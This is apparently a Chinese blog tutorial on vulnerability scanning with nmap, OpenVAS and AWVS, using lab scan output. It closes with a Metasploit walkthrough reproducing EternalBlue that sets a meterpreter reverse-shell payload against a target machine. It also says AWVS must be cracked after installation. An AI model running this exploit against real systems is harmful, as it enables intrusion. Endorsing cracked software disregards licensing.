扫描技术
发现目标环境中有哪些资产,联网设备,主机,服务器,各种服务等.可以通过网络漏洞扫描,全面掌握目标服务器存在的安全漏洞.市面上常用的扫描有Nessus、NeXpose、OpenVAS等
- 漏洞扫描原理
网络漏洞扫描指的是利用一些自动化工具发现网络上各类主机设备的安全漏洞.这些自动化工具通常称为漏洞扫描器.漏洞扫描通常可以分为两类,黑盒扫描和白盒扫描.
- 黑盒扫描
黑盒扫描一般都是通过远程识别服务的类型和版本,对服务是否存在漏洞进行判定.在一些最新的漏洞扫描软件中,应用了一些更高级的技术,比如模拟渗透攻击等.
- 白盒扫描
白盒扫描就是在具有主机操作权限的情况下进行漏洞扫描.比如微软的补丁更新程序会定期对你的操作系统进行扫描,查找存在的安全漏洞,并向你推送相应的操作系统补丁.白盒扫描的结果更加准确,但一般来说它所识别出的漏洞不应当作为外部渗透测试的最终数据,因为这些漏洞由于防火墙和各类防护软件的原因很可能无法在外部渗透测试中得到利用.同时,一般情况下你是没有机会获取用户名和口令.漏洞扫描器一般会附带一个用于识别主机漏洞的特征库,并定期进行更新.在漏洞扫描的时候,就是利用特征库里的脚本与目标系统的反馈信息进行匹配,如果能够匹配上,就说明存在某一个漏洞.漏洞扫描器在识别漏洞的过程中,会向目标发送大量的数据包,有时候会导致目标系统拒绝服务或被扫描数据包阻塞,扫描行为也会被对方的入侵检测设备发现.漏洞扫描器扫描出的结果通常会有很多误报(报告发现的漏洞实际并不存在)或者漏报(未报告发现漏洞但漏洞实际存在).因此,需要对扫描结果进行人工分析,确定哪些漏是实际存在的,这个过程就叫做漏洞验证.这是渗透测试过程中不可缺少的一步,只有验证漏洞存在的真实性,才能对漏洞进行深度利用.渗透测试工作中,在得到客户认可的情况下,可以使用扫描器进行扫描,但使用时一定要注意规避风险,对其系统运行可能造成的影响将到最低.
nmap
跨平台,在没有指定端口的情况下,默认扫描
1~1000端口
| 参数 | 结果 |
|---|---|
| -sP/-sn | ping 扫描 |
| -p 80 | 指定80端口 |
| -p 1-80 | 指定1-80端口 |
| -p 80,3389 | 指定80,3389端口 |
| -p- | 指定1-65535端口 |
| -sT | TCP 全链接扫描 |
| -sS | SYN 半连接扫描 |
| -sN | Null 扫描 |
| -sX | Xmas 扫描 |
| -sF | Fin 扫描 |
| -sV | 显示服务的详细版本 |
| -sV | 服务版本探测 |
| -O | 启用操作系统探测 |
| -A | 全面扫描 |
| -oN/-oX | 保存扫描结果txt/xml |
| -T0~-T5 | 时序选项 |
root@kali:~# nmap 10.0.0.0/24 -sP
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:36 CST
Nmap scan report for 10.0.0.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.0.0.2
Host is up (0.000098s latency).
MAC Address: 00:50:56:EF:31:20 (VMware)
Nmap scan report for 10.0.0.7
Host is up (0.00020s latency).
MAC Address: 00:0C:29:19:02:C3 (VMware)
Nmap scan report for 10.0.0.254
Host is up (0.00015s latency).
MAC Address: 00:0C:29:E5:20:37 (VMware)
Nmap scan report for 10.0.0.221
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.06 seconds
root@kali:~# nmap 10.0.0.7 -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:37 CST
Nmap scan report for 10.0.0.7
Host is up (0.0011s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
9200/tcp open wap-wsp
9300/tcp open vrace
MAC Address: 00:0C:29:19:02:C3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds
root@kali:~# nmap 10.0.0.0/24 -p 80
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:38 CST
Nmap scan report for 10.0.0.1
Host is up (0.00027s latency).
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.0.0.2
Host is up (0.00011s latency).
PORT STATE SERVICE
80/tcp closed http
MAC Address: 00:50:56:EF:31:20 (VMware)
Nmap scan report for 10.0.0.7
Host is up (0.00024s latency).
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:19:02:C3 (VMware)
Nmap scan report for 10.0.0.254
Host is up (0.000073s latency).
PORT STATE SERVICE
80/tcp filtered http
MAC Address: 00:0C:29:E5:20:37 (VMware)
Nmap scan report for 10.0.0.221
Host is up (0.000052s latency).
PORT STATE SERVICE
80/tcp closed http
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.47 seconds
root@kali:~# nmap 10.0.0.7 -A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:38 CST
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:39 (0:00:07 remaining)
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:39 (0:00:09 remaining)
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:39 (0:00:10 remaining)
Stats: 0:01:24 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:40 (0:00:26 remaining)
Nmap scan report for 10.0.0.7
Host is up (0.0012s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 5f:4b:28:0f:20:9f:b7:dc:a7:25:9a:fc:d7:31:a0:63 (RSA)
| 256 e4:a3:00:75:0d:a3:39:a0:98:38:fe:5b:a8:62:04:f8 (ECDSA)
|_ 256 f5:48:1e:be:c8:d6:f6:a1:76:9e:a7:24:42:f7:dc:80 (ED25519)
80/tcp open http nginx 1.18.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: nginx/1.18.0
|_http-title: \xE7\xA5\x9E\xE5\x87\xBA\xE9\xAC\xBC\xE6\xB2\xA1\xE7\x9A\x84Enderman - long long ago,I was born.
3306/tcp open mysql MySQL 5.7.28
| mysql-info:
| Protocol: 10
| Version: 5.7.28
| Thread ID: 1268
| Capabilities flags: 65535
| Some Capabilities: SupportsLoadDataLocal, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolOld, SupportsTransactions, Support41Auth, SupportsCompression, FoundRows, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, LongPassword, InteractiveClient, ConnectWithDatabase, DontAllowDatabaseTableColumn, ODBCClient, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: &fbK?\x08\Q\x1AT%]6"?2\x0Cxy8
|_ Auth Plugin Name: 79
9200/tcp open wap-wsp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.0 200 OK
| content-type: application/json; charset=UTF-8
| content-length: 492
| "name" : "node-1",
| "cluster_name" : "elasticsearch",
| "cluster_uuid" : "RpKAqucdQR6DbP8QChZ6CA",
| "version" : {
| "number" : "6.7.0",
| "build_flavor" : "default",
| "build_type" : "rpm",
| "build_hash" : "8453f77",
| "build_date" : "2019-03-21T15:32:29.844721Z",
| "build_snapshot" : false,
| "lucene_version" : "7.7.0",
| "minimum_wire_compatibility_version" : "5.6.0",
| "minimum_index_compatibility_version" : "5.0.0"
| "tagline" : "You Know, for Search"
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: DELETE,GET,HEAD
| content-type: text/plain; charset=UTF-8
| content-length: 0
| Help, SSLSessionReq:
| HTTP/1.0 400 Bad Request
| content-type: application/json; charset=UTF-8
| content-length: 203
| {"error":{"root_cause":[{"type":"illegal_argument_exception","reason":"text is empty (possibly HTTP/0.9)"}],"type":"illegal_argument_exception","reason":"text is empty (possibly HTTP/0.9)"},"status":400}
| RTSPRequest:
| HTTP/1.1 200 OK
| Allow: DELETE,GET,HEAD
| content-type: text/plain; charset=UTF-8
|_ content-length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9200-TCP:V=7.70%I=7%D=12/10%Time=5FD1B463%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,243,"HTTP/1\.0\x20200\x20OK\r\ncontent-type:\x20application/j
SF:son;\x20charset=UTF-8\r\ncontent-length:\x20492\r\n\r\n{\n\x20\x20\"nam
SF:e\"\x20:\x20\"node-1\",\n\x20\x20\"cluster_name\"\x20:\x20\"elasticsear
SF:ch\",\n\x20\x20\"cluster_uuid\"\x20:\x20\"RpKAqucdQR6DbP8QChZ6CA\",\n\x
SF:20\x20\"version\"\x20:\x20{\n\x20\x20\x20\x20\"number\"\x20:\x20\"6\.7\
SF:.0\",\n\x20\x20\x20\x20\"build_flavor\"\x20:\x20\"default\",\n\x20\x20\
SF:x20\x20\"build_type\"\x20:\x20\"rpm\",\n\x20\x20\x20\x20\"build_hash\"\
SF:x20:\x20\"8453f77\",\n\x20\x20\x20\x20\"build_date\"\x20:\x20\"2019-03-
SF:21T15:32:29\.844721Z\",\n\x20\x20\x20\x20\"build_snapshot\"\x20:\x20fal
SF:se,\n\x20\x20\x20\x20\"lucene_version\"\x20:\x20\"7\.7\.0\",\n\x20\x20\
SF:x20\x20\"minimum_wire_compatibility_version\"\x20:\x20\"5\.6\.0\",\n\x2
SF:0\x20\x20\x20\"minimum_index_compatibility_version\"\x20:\x20\"5\.0\.0\
SF:"\n\x20\x20},\n\x20\x20\"tagline\"\x20:\x20\"You\x20Know,\x20for\x20Sea
SF:rch\"\n}\n")%r(HTTPOptions,67,"HTTP/1\.0\x20200\x20OK\r\nAllow:\x20DELE
SF:TE,GET,HEAD\r\ncontent-type:\x20text/plain;\x20charset=UTF-8\r\ncontent
SF:-length:\x200\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20200\x20OK\r\nAll
SF:ow:\x20DELETE,GET,HEAD\r\ncontent-type:\x20text/plain;\x20charset=UTF-8
SF:\r\ncontent-length:\x200\r\n\r\n")%r(Help,12B,"HTTP/1\.0\x20400\x20Bad\
SF:x20Request\r\ncontent-type:\x20application/json;\x20charset=UTF-8\r\nco
SF:ntent-length:\x20203\r\n\r\n{\"error\":{\"root_cause\":\[{\"type\":\"il
SF:legal_argument_exception\",\"reason\":\"text\x20is\x20empty\x20\(possib
SF:ly\x20HTTP/0\.9\)\"}\],\"type\":\"illegal_argument_exception\",\"reason
SF:\":\"text\x20is\x20empty\x20\(possibly\x20HTTP/0\.9\)\"},\"status\":400
SF:}")%r(SSLSessionReq,12B,"HTTP/1\.0\x20400\x20Bad\x20Request\r\ncontent-
SF:type:\x20application/json;\x20charset=UTF-8\r\ncontent-length:\x20203\r
SF:\n\r\n{\"error\":{\"root_cause\":\[{\"type\":\"illegal_argument_excepti
SF:on\",\"reason\":\"text\x20is\x20empty\x20\(possibly\x20HTTP/0\.9\)\"}\]
SF:,\"type\":\"illegal_argument_exception\",\"reason\":\"text\x20is\x20emp
SF:ty\x20\(possibly\x20HTTP/0\.9\)\"},\"status\":400}");
MAC Address: 00:0C:29:19:02:C3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 1.23 ms 10.0.0.7
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.01 seconds-sSSYN 半连接扫描
-sTTCP 全链接扫描
OpenVAS
OpenVAS安装
推荐从官网下载ISO镜像进行安装镜像下载地址
- 新建虚拟机
分卷压缩,下载后分别改为对应名称再解压成iso镜像
- gsm-ce-6.0.3.part1.rar
- gsm-ce-6.0.3.part2.rar
- gsm-ce-6.0.3.part3.rar
- gsm-ce-6.0.3.part4.rar
- gsm-ce-6.0.3.part5.rar
- 系统:linux
- 版本:其他Linux 64位
- 内存:4G
- 硬盘:20G
- CPUS:2个
- gsm-ce-6.0.3.iso
- 开启虚拟机进行安装
- 等待3分钟左右
- 之后输入密码确认
- 登录
- 在About栏我们可以查看当前的IP地址
OpenVAS使用
- 新建一个扫描目标
- 新建一个扫描任务
- 开始扫描
Web漏洞扫描
随着互联网的发展以及云计算的发展,使得政府、银行、企业以及各个组织基本上都有自己的门户网站.Web 应用越来越多,同时Web 应用的攻击成本、难度都比较低,Web 应用成为黑客攻击的主要目标.无论黑客出于什么样的目的,Web 应用所面临的挑战都是很大的.如何及时、快速发现Web 应用安全漏洞,并且修补安全漏洞,减轻或消除Web 安全风险成为安全行业的重要课题.小型Web 应用几十上百个页面,大型的Web 应用成千上万个页面.如果靠人工的方式去检测每个页面的安全性,显然,这个成本是难以估计的.所以,我们需要借助于自动化工具,帮助审计员去发现Web 安全漏洞.这些自动化工具就是Web 漏洞扫描器.市面上Web 漏洞扫描器有很多,其中以IBM 公司的AppScan 和商业化Web 漏洞扫描器AWVS 为优秀.
- Web漏洞扫描原理
进行Web漏洞扫描的时候,大致分为一下几个步骤
- 爬行网站目录
- 使用漏洞脚本扫描
- 保存扫描结果
安装过程下一步,完成后需要破解
创建扫描目标
- 用户和密码都是test
扫描结果分析
- 可以将漏洞点依次展开,可以看到含有漏洞的页面,以及造成漏洞的参数.同时在右侧边栏,可以看到漏洞的详细信息.包括漏洞描述和测试payload.
保存扫描报告
- 可以将扫描结果保存下来.保存的扫描结果文件的后缀名是[.wvs].如果安装了虚拟打印机,也可以将扫描结果保存成pdf 格式,便于传阅.
永恒之蓝漏洞复现
- 工具: msfconsole msf
msfconsole
search MS17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
#目标靶机ip
set RHOST 10.0.0.5
#本机IP
set LHOST 10.0.0.221
exploit
Alipay
Wechat
最后一次更新于2020-12-18 10:39
0 条评论